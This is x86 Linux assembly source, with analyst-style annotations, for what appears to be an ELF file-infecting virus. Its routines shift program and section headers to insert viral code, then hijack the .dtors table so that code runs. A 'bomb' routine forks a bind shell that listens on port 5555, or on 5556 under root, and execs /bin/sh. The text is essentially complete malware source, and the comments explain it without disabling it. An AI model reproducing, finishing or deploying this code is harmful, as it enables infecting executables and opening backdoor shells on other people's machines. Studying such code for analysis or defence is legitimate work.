add esp, 0x40
xor edx, edx
mov eax, [ecx+0x14]
mov ecx, 0x1000
div ecx
test edx, edx ; is file align on 0x1000 ?
jne notinfected ; if no file is not infected, infection FALSE
xor eax, eax ; else infection TRUE
notinfected:
ret
;----------------------------------------------------------------------------
;
; nextfile: move the caller's stack pointer to the next entry of a name list
; kept on the stack (presumably the list of target file names; each entry's
; first byte is the distance in bytes to the following entry, which is how
; this routine reads it).
;
; in  : esp -> current entry (seen after the return address is popped)
; out : esp -> next entry; al = first byte of that entry (eax zero-extended)
; clobbers: eax, ebx (ebx carries the return address while esp is moved)
; note: the return address is pushed back at the NEW esp, so the caller's
;       esp really is different after `ret` -- that is the routine's effect.
nextfile:
pop ebx ; save return address
xor eax, eax
mov al, [esp] ; eax = byte offset to the next name
add esp, eax ; esp -> next name
mov al, [esp] ; al = first byte of the next entry
push ebx ; return address back on top of the new esp
ret
;---------------------------------------------------------------------------
;
; read: read one dword from a file descriptor, i.e. sys_read(fd, &tmp, 4)
; with tmp being a 4-byte slot reserved on the stack.
;
; in  : ebx = fd
; out : eax = the 4 bytes that were read (popped from the stack slot)
; clobbers: ecx (buffer pointer), edx (= 4), flags
; note: the syscall's own return value (byte count or -errno) is overwritten
;       by the `pop`, so a short read or an error cannot be detected by the
;       caller; on error eax holds whatever the stack slot contained.
read:
xor eax, eax
mov al, sys_read
sub esp, 4 ; 4-byte buffer on the stack
mov ecx, esp ; ecx -> buffer
mov edx, 4 ; count = 4
int 0x80 ; read(ebx, ecx, 4)
pop eax ; eax = dword read; the syscall return value is discarded
ret
;-------------------------------------------------------------------------------
;
; Mapping: map the file with old_mmap (the single-struct form of mmap).
; The six arguments are pushed so that esp ends up pointing at a struct
; {addr, len, prot, flags, fd, offset} = {0, ecx, 3, 1, ebx, 0}, and ebx is
; pointed at that struct for the call (prot 3 = PROT_READ|PROT_WRITE,
; flags 1 = MAP_SHARED on Linux x86).
;
; in  : ebx = fd
;       ecx = length of the mapping (not listed in the original header, but
;       it is pushed as the 2nd argument; Demap takes the same ecx)
; out : eax = address of the mapping (or a negative -errno; not checked)
;       ebx = fd (restored)
; clobbers: edx (left pointing at the popped argument block), flags
Mapping:
xor edx, edx
push edx ; offset = 0
push ebx ; fd
inc edx
push edx ; flags = 1 (MAP_SHARED)
inc edx
inc edx
push edx ; prot = 3 (PROT_READ|PROT_WRITE)
push ecx ; len = ecx
xor eax, eax
push eax ; addr = 0 (kernel chooses)
mov al, sys_mmap
xchg ebx, edx ; park the fd in edx while ebx serves as the argument pointer
mov ebx, esp ; ebx -> argument struct
int 0x80 ; old_mmap(struct *ebx)
xchg ebx, edx ; ebx = fd again; edx = pointer to the argument block
add esp, 0x18 ; drop the six pushed dwords
ret
;-------------------------------------------------------------------------------
;
; Demap: sys_munmap(addr = 0, len = ecx).
;
; in  : ecx = size of the mapping
; out : eax == 0 on success (otherwise -errno)
; clobbers: ebx (zeroed), flags
; note: ebx is zeroed before the call, so the address argument is 0 rather
;       than the address returned by Mapping; only the range starting at
;       address 0 is passed to the kernel.
Demap:
xor eax, eax
mov al, sys_munmap
xor ebx, ebx ; addr = 0
int 0x80 ; munmap(0, ecx)
ret
;-------------------------------------------------------------------------------
;
; PatchSegment: walk the program header table of a mapped ELF32 image and
; rewrite each entry to account for one extra 0x1000-byte page inserted at
; the start of the file:
;   p_type == 6 (PT_PHDR)          : p_vaddr -= 0x1000, p_paddr -= 0x1000
;   p_offset == 0 (author: "TEXT") : p_vaddr/p_paddr -= 0x1000,
;                                    p_filesz/p_memsz += 0x1000,
;                                    ebp = the new p_vaddr
;   any other entry                : p_offset += 0x1000
; Elf32_Ehdr fields used: e_phoff 0x1c, e_phentsize 0x2a, e_phnum 0x2c.
; Elf32_Phdr fields used: p_type 0, p_offset 4, p_vaddr 8, p_paddr 0xc,
; p_filesz 0x10, p_memsz 0x14.
;
; in  : eax = address of the mapped file (ELF header)
; out : ebp = p_vaddr of the patched p_offset==0 segment (hijackDtors stores
;       this value into .dtors); phdrs are modified in place in the mapping
; clobbers: ecx, edx, flags
; note: e_phnum is read as one byte and the phdr stride is added to dl only,
;       so a carry out of the low byte of edx is lost.
PatchSegment:
xor ecx, ecx
mov cl, BYTE [eax+0x2c]; ecx = e_phnum (low byte only)
mov edx, [eax+0x1c] ; edx = e_phoff
add edx, eax ; edx -> first Elf32_Phdr
rygo:
push ecx ; save the remaining count; ecx is scratch below
mov ecx, 0x06
cmp [edx], ecx ; p_type == PT_PHDR ?
jne hi
mov ecx, 0x1000
sub [edx+0x08], ecx ; p_vaddr -= 0x1000
sub [edx+0x0c], ecx ; p_paddr -= 0x1000
jmp ha
hi: xor ecx, ecx
cmp [edx+0x04], ecx ; p_offset == 0 ? (author treats this as the TEXT segment)
jne ho
mov ecx, 0x1000
sub [edx+0x08], ecx ; p_vaddr -= 0x1000
sub [edx+0x0c], ecx ; p_paddr -= 0x1000
add [edx+0x10], ecx ; p_filesz += 0x1000
add [edx+0x14], ecx ; p_memsz += 0x1000
mov ebp, [edx+08h] ; ebp = new p_vaddr (author: pointer to viral code)
jmp ha
ho: mov ecx, 0x1000
add [edx+04], ecx ; p_offset += 0x1000: segment moves one page down the file
ha:
pop ecx
dec ecx
test ecx, ecx ; more phdrs ?
je good ;
add dl, BYTE [eax+0x2a]; edx += e_phentsize (8-bit add, no carry into dh)
jmp rygo
good:
ret
;----------------------------------------------------------------------------
;
; PatchSection: add 0x1000 to sh_offset of every section header except
; index 0 (the null section), following the one-page shift of the file
; contents.
; Elf32_Ehdr fields used: e_shoff 0x20, e_shentsize 0x2e, e_shnum 0x30.
; Elf32_Shdr field used: sh_offset 0x10.
;
; in  : eax = address of the mapped file (ELF header)
; out : none (section headers modified in place)
; clobbers: ebx, ecx, edx, esi, flags
; notes:
;   - the table is addressed at e_shoff + 0x1000, i.e. at its already
;     shifted position; the e_shoff field of the ELF header itself is not
;     changed by this routine.
;   - the body runs e_shnum-1 times via `loop`; with e_shnum == 1 the
;     counter would wrap.
PatchSection:
mov edx, [eax+0x20] ; edx = e_shoff
add edx, eax
add edx, 0x1000 ; edx -> shdr table at its shifted file position
xor ecx, ecx
mov cx, [eax+0x30] ; ecx = e_shnum
dec ecx ; section 0 is skipped
xor esi, esi
mov si, [eax+0x2E] ; esi = e_shentsize
patch:
add edx, esi ; edx -> next Elf32_Shdr
mov ebx, [edx+0x10] ; sh_offset
add ebx, 0x1000
mov [edx+0x10], ebx ; sh_offset += 0x1000
loop patch
ret
;-----------------------------------------------------------------------------
; hijackDtors: find the section whose name starts with ".dto" in the mapped
; ELF32 image and store ebp into the first zero dword of that section.
;
; in  : ebx = address of the mapped file (ELF header)
;       ebp = value to store (set by PatchSegment: p_vaddr of the patched
;       p_offset==0 segment)
; out : eax == 0 if no matching section was found; otherwise eax = address
;       of the matching Elf32_Shdr and the mapping has been written to
; clobbers: ecx, edx, esi, edi, flags
; Elf32_Ehdr fields used: e_shoff 0x20, e_shentsize 0x2e, e_shnum 0x30,
; e_shstrndx 0x32. Elf32_Shdr fields used: sh_name 0, sh_offset 0x10.
; notes:
;   - `mul cl` is an 8-bit multiply: only the low byte of e_shentsize and of
;     e_shstrndx take part (the author's comment says nb_section < 255).
;   - the name scan starts at section 1 but still iterates e_shnum times,
;     so the last pass reads the entry just past the table.
;   - only the first 4 bytes of the name are compared ('.dto').
hijackDtors:
;find the shdr of .shstrtab: map + e_shoff + e_shentsize*e_shstrndx
xor eax, eax
mov ax, [ebx+0x2E] ; ax = e_shentsize
mov cl, [ebx+0x32] ; cl = e_shstrndx, low byte only (author assumes nb_section < 255)
mul cl ; ax = al * cl (8-bit multiply)
;
add eax, [ebx+0x20] ; + e_shoff = file offset of the .shstrtab shdr
add eax, ebx ; + map base
mov esi, eax
add esi, 0x10 ; esi -> sh_offset of .shstrtab
;look for a section whose sh_name begins with ".dto"
xor eax, eax
mov eax, [ebx+0x20] ; eax = e_shoff
add eax, ebx ; eax -> shdr table
xor ecx, ecx
mov cx, [ebx+0x30] ; ecx = e_shnum (loop count)
mov edi, [esi] ; edi = sh_offset of .shstrtab
add edi, ebx ; edi -> string table contents
xor edx, edx
next_shname:
xor edx, edx
mov dx, WORD [ebx+0x2E] ; edx = e_shentsize
add eax, edx ; eax -> next shdr (section 0 is never examined)
mov esi, [eax] ; sh_name
add esi, edi ; esi -> name string
mov edx, [esi] ; first four bytes of the name
cmp edx, '.dto'
je dtor_finding
loop next_shname
xor eax, eax ; not found: return 0
ret ;
;walk the .dtors table to its first zero dword and store ebp there
dtor_finding:
mov ecx, [eax+0x10] ; sh_offset of .dtors
add ecx, ebx ; + map base -> .dtors contents
next_dtor:
add ecx, 4 ; entry 0 is skipped (author: must be 0xFFFFFFFF), then
mov edx, [ecx] ; advance over every non-zero entry
cmp edx, 0
jne next_dtor
mov DWORD [ecx], ebp ; overwrite the first zero dword with ebp
ret
;----------------------------------------------------------------------------
; bomb: fork; the child creates a TCP socket, binds it to port 5556 when
; uid == 0 and 5555 otherwise, listens, accepts one connection, runs a
; dup2 loop and execs "//bin/sh". The parent returns at once.
;
; in  : none documented (the child inherits the registers as they are)
; out : parent: returns with eax = fork's return value
;       child : does not return (execve, or SIGKILL to itself if bind fails)
; Syscall usage: sys_socket is evidently the socketcall multiplexer -- ebx
; selects the sub-call (1 socket, 2 bind, LISTEN listen, 5 accept) and ecx
; points at the argument block built on the stack. Return values are not
; checked except for bind.
; Observable artefacts: AF_INET / SOCK_STREAM, INADDR_ANY, port bytes
; 15 B3 (5555) or 15 B4 (5556) in network byte order, path "//bin/sh".
bomb:
xor eax, eax
mov al, sys_fork ; fork the logic bomb
int 0x80
test eax, eax
je bindshell ; child (eax == 0) binds the shell
ret ; parent returns
bindshell:
;socket(AF_INET, SOCK_STREAM, 0) through socketcall(1, args)
xor eax, eax
cdq ; edx = 0
mov al, sys_socket
push edx ; protocol = 0
inc edx
push edx ; type = 1 (SOCK_STREAM)
inc edx
push edx ; domain = 2 (AF_INET)
mov ecx, esp ; ecx -> {domain, type, protocol}
push byte 1
pop ebx ; ebx = 1 -> socket sub-call
int 0x80
;bind(socket, &sockaddr_in, 16)
mov edi, eax ; edi = listening socket (no error check)
cdq ; edx = sign of eax: 0 when the fd is non-negative
xor ecx, ecx
mov cx, 0xB315 ; cx = port 5555 in network byte order (bytes 15 B3)
xor eax, eax
mov al, sys_getuid
int 0x80
test eax, eax ; uid != 0 ?
jne binduser ; -> keep port 5555
inc ch ; uid 0: cx = 0xB415 -> port 5556
binduser:
push edx ; sin_addr = 0 (INADDR_ANY, given edx == 0)
push word cx ; sin_port: 5556 if uid 0, else 5555
inc ebx ; ebx = 2: doubles as AF_INET and as the bind sub-call number
push bx ; sin_family = 2 (AF_INET)
mov ecx, esp ; ecx -> sockaddr_in
push byte 16 ; addrlen
push ecx ; &sockaddr_in
push edi ; socket
mov ecx, esp ; ecx -> {socket, &sockaddr_in, 16}
xor eax, eax
mov al, sys_socket
int 0x80 ; socketcall(2 = bind, args)
;if bind fails the process sends itself SIGKILL
test eax, eax
je listen
xor eax, eax
mov al, sys_getpid
int 0x80
xchg ebx, eax ; ebx = own pid
xor ecx, ecx
mov cl, SIGKILL
xor eax, eax
mov al, sys_kill
int 0x80 ; kill(getpid(), SIGKILL)
;listen(socket, backlog)
listen:
mov al, sys_socket ; eax == 0 here (bind succeeded), so eax = sys_socket
mov bl, LISTEN ; listen sub-call
int 0x80 ; ecx still -> the bind block: backlog = the &sockaddr_in value
;accept(socket, addr, len)
push eax ; addr = listen's return value
push edi ; socket
mov ecx, esp ; ecx -> {socket, eax, <socket dword left from the bind block>}
inc ebx ; 5 -> accept sub-call (the author's comment implies LISTEN == 4)
mov al, sys_socket
int 0x80 ; eax = accepted connection (no error check)
;dup2 loop
dup:
mov ecx, ebx ; ecx is reloaded from ebx at the top of every pass
mov ebx, eax ; ebx = return value of the previous syscall
dec ecx
mov al, sys_dup2 ; assumes the fd in eax is < 256 so al alone selects the call
int 0x80 ; dup2(ebx, ecx)
inc ecx
loop dup ; pass count follows the runtime fd values, not a fixed 3
;execve("//bin/sh", {path, NULL}, edx)
mov al, sys_exec
push ecx ; string terminator (ecx == 0 when `loop` falls through)
push 0x68732f6e ; "n/sh"
push 0x69622f2f ; "//bi"
mov ebx, esp ; ebx -> "//bin/sh"
push ecx ; argv[1] = NULL
push ebx ; argv[0] = path
mov ecx, esp ; ecx -> argv
int 0x80 ; execve(ebx, ecx, edx)
fin_code: